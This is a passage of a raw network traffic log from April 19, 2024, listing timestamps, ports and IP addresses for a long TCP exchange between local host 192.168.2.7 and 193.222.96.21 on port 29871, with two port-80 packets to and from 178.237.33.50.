Apr 19, 2024 10:59:13.322966099 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.323008060 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323046923 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323069096 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.323084116 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323126078 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323134899 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.323162079 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323199034 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323208094 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.323240042 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323277950 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323285103 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.323314905 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323353052 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323359013 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.323390007 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323427916 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323432922 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.323465109 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323503017 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323509932 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.323540926 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323577881 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323585987 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.323615074 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323652983 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323657990 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.323692083 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323735952 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323741913 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.323772907 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323811054 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323818922 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.323848009 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323885918 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323890924 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.323921919 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323960066 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.323965073 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.323997974 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324039936 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324043989 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.324078083 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324125051 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.324161053 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324174881 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324188948 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324227095 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324259043 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.324265957 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324275970 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.324304104 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324341059 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324357033 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.324381113 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324418068 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324446917 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.324454069 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324500084 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.324506044 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324542999 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324579954 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324599028 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.324618101 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324655056 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324660063 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.324692965 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324728966 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324734926 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.324768066 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324806929 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324811935 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.324843884 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324881077 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324887991 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.324918032 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.324963093 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.523367882 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523406029 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523426056 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523444891 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523463964 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523482084 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523500919 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523519993 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523519039 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.523538113 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523559093 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523575068 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.523576975 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523586988 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523597002 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523613930 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523633003 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523643017 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.523650885 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523669958 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523684025 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.523686886 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523708105 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523714066 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.523725033 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523742914 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523745060 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.523761988 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523777008 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.523781061 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523801088 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523812056 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523833990 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523835897 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.523854017 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523858070 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.523873091 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523889065 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.523890972 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523909092 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523925066 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523940086 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.523945093 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523956060 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523971081 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.523976088 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.523997068 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524005890 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524014950 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524034023 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524050951 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524053097 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524065018 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524069071 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524085999 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524108887 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524122953 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524142027 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524156094 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524159908 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524178028 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524188042 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524195910 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524214983 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524225950 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524235010 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524252892 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524270058 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524271011 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524290085 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524307013 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524310112 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524328947 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524338961 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524348974 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524368048 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524374962 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524384975 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524405003 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524411917 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524421930 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524439096 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524456024 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524462938 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524472952 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524490118 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524499893 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524507999 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524523973 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524525881 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524547100 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524554014 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524564981 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524584055 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524595022 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524601936 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524621010 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524637938 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524646044 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524655104 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524672985 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524684906 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524691105 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524707079 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524708033 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524725914 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524743080 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524744987 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524760008 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524775028 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524780989 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524795055 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524813890 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524815083 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524832964 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524846077 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524852037 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524868965 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524878979 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524889946 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524909019 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524915934 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524926901 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524945974 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524959087 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.524962902 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524981976 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.524982929 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.525001049 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525018930 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525018930 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.525037050 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525057077 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525065899 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.525074959 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525093079 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525099039 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.525113106 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525130033 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525139093 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.525151014 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525171995 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525176048 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.525190115 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525208950 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525214911 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.525227070 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525247097 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525250912 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.525264978 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525285006 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525288105 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.525304079 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525314093 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525330067 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525340080 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525350094 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525358915 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.525367022 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525387049 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525399923 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.525405884 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525420904 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.525424004 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525444031 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525456905 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.525461912 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525480032 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525490046 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.525497913 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525516033 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525535107 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525542021 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.525553942 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525572062 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525580883 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.525589943 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525603056 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.525608063 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525626898 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525638103 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.525645971 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525664091 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525671959 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.525681973 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525701046 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.525723934 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.525753021 CEST | 49709 | 29871 | 192.168.2.7 | 193.222.96.21 |
Apr 19, 2024 10:59:13.653656960 CEST | 80 | 49710 | 178.237.33.50 | 192.168.2.7 |
Apr 19, 2024 10:59:13.653731108 CEST | 49710 | 80 | 192.168.2.7 | 178.237.33.50 |
Apr 19, 2024 10:59:13.724386930 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724425077 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724445105 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
Apr 19, 2024 10:59:13.724463940 CEST | 29871 | 49709 | 193.222.96.21 | 192.168.2.7 |
